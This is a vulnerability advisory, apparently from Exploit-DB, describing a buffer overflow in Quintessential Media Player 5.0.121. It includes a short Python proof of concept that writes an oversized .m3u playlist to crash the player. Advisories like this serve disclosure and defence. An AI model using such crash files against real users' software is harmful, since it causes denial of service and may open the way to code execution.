Quintessential Media Player Buffer Overflow Vulnerability

vendor:

Quintessential Media Player

by:

abhishek lyall

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Quintessential Media Player

Affected Version From: 5.0.121

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:quinnware:quintessential_media_player:5.0.121

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2/SP3

Unknown

Quintessential Media Player Buffer Overflow Vulnerability

Quintessential Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Mitigation:

Apply the latest patches or updates provided by the vendor. Avoid opening files from untrusted sources.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42307/info

Quintessential Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Quintessential Media Player 5.0.121 is vulnerable; other versions may also be affected.

#Quintessential Player 5.0.121 .m3u Crash POC
#vulnerble application link http://www.quinnware.com/downloads.php
#tested on XP SP2/3
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web::: http://aslitsecurity.com  Blog::: http://aslitsecurity.blogspot.com
#!/usr/bin/python

filename = "Quintessential.m3u"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()